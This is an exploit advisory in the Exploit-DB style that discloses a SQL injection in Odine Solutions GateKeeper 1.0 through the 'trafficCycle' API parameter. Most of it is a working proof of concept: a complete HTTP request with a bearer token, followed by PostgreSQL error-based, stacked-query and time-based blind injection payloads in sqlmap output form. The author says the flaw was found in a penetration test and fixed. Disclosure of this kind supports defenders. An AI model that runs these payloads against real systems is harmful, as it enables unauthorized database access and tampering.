# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection # Date: 05.10.2021 # Exploit Author: Emel Basayar # Vendor: Odine Solutions - odinesolutions.com # Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/ # Version: 1.0 # Category: Webapps # Tested on: Ubuntu 18 TLS # Description : The vulnerability allows an attacker to inject sql commands from search section with 'trafficCycle' parameter. # This vulnerability was discovered during the penetration testing and the vulnerability was fixed. ==================================================== # PoC : SQLi : GET /rass/api/v1/trafficCycle/98 HTTP/1.1 Host: 192.168.1.25 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: application/json Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx Origin: https://192.168.1.25 Connection: close Referer: https://192.168.1.25 Parameter: #1* (URI) Type: error-based Title: PostgreSQL AND error-based - WHERE or HAVING clause Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB Type: stacked queries Title: PostgreSQL > 8.1 stacked queries (comment) Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)-- Type: time-based blind Title: PostgreSQL > 8.1 AND time-based blind Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC --- web application technology: Nginx back-end DBMS: PostgreSQL ====================================================